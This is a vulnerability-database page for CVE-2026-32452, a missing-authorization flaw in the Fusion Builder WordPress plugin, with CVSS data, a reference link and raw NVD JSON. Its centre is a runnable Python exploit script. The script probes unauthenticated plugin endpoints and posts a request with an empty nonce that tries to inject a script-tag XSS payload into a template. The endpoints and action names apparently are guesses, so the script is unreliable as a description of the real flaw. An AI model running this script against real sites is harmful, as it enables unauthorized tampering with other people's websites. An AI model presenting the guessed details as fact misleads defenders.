Security Vulnerability Report
CVE-2026-32452 CVSS 5.3 MEDIUM

Published: 2026-03-13 19:55:07
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in ThemeFusion Fusion Builder fusion-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fusion Builder: from n/a through < 3.15.0.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ThemeFusion Fusion Builder < 3.15.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-32452 PoC - Missing Authorization in Fusion Builder
# Target: WordPress site with Fusion Builder < 3.15.0
target_url = "http://target-wordpress-site.com"


# PoC 1: Check if target is vulnerable by accessing Fusion Builder endpoint
def check_vulnerability():
    # Try to access Fusion Builder API without authentication
    endpoints = [
        "/wp-json/fusion-builder/v1/elements",
        "/wp-admin/admin-ajax.php?action=fusion_builder_ajax",
        "/wp-json/fusion-builder/v1/templates",
        "/wp-json/fusion-builder/v1/shortcodes"
    ]
    for endpoint in endpoints:
        url = target_url + endpoint
        try:
            response = requests.get(url, timeout=10)
            # If we get a 200 response without auth, vulnerability exists
            if response.status_code == 200:
                print(f"[+] Vulnerable endpoint found: {url}")
                print(f"[+] Response: {response.text[:500]}")
                return True
            else:
                print(f"[-] Endpoint {url} returned: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    return False


# PoC 2: Attempt to create/modify content via Fusion Builder
def exploit_builder_access():
    # Construct malicious request to Fusion Builder API
    exploit_payload = {
        'action': 'fusion_builder_ajax',
        'fusion_builder_nonce': '',  # May be empty if nonce check is missing
        'fusion_action': 'create_element',
        'element': 'fusion_template',
        'data': '{"content":"<script>alert(\"XSS\")</script>"}'
    }
    url = target_url + "/wp-admin/admin-ajax.php"
    try:
        response = requests.post(url, data=exploit_payload, timeout=10)
        if response.status_code == 200 and 'fusion' in response.text.lower():
            print("[+] Successfully accessed Fusion Builder without authorization")
            print(f"[+] Response: {response.text[:500]}")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Exploit failed: {e}")
    return False


if __name__ == "__main__":
    print("[*] CVE-2026-32452 PoC - Fusion Builder Missing Authorization")
    print("[*] Target:", target_url)
    check_vulnerability()
    exploit_builder_access()

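References

https://patchstack.com/database/Wordpress/Plugin/fusion-builder/vulnerability/wordpress-fusion-builder-plugin-3-15-0-broken-access-control-vulnerability-2?_s_id=cve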

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32452", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:06.580", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in ThemeFusion Fusion Builder fusion-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fusion Builder: from n/a through < 3.15.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en ThemeFusion Fusion Builder fusion-builder permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Fusion Builder: desde n/a hasta &lt; 3.15.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/fusion-builder/vulnerability/wordpress-fusion-builder-plugin-3-15-0-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}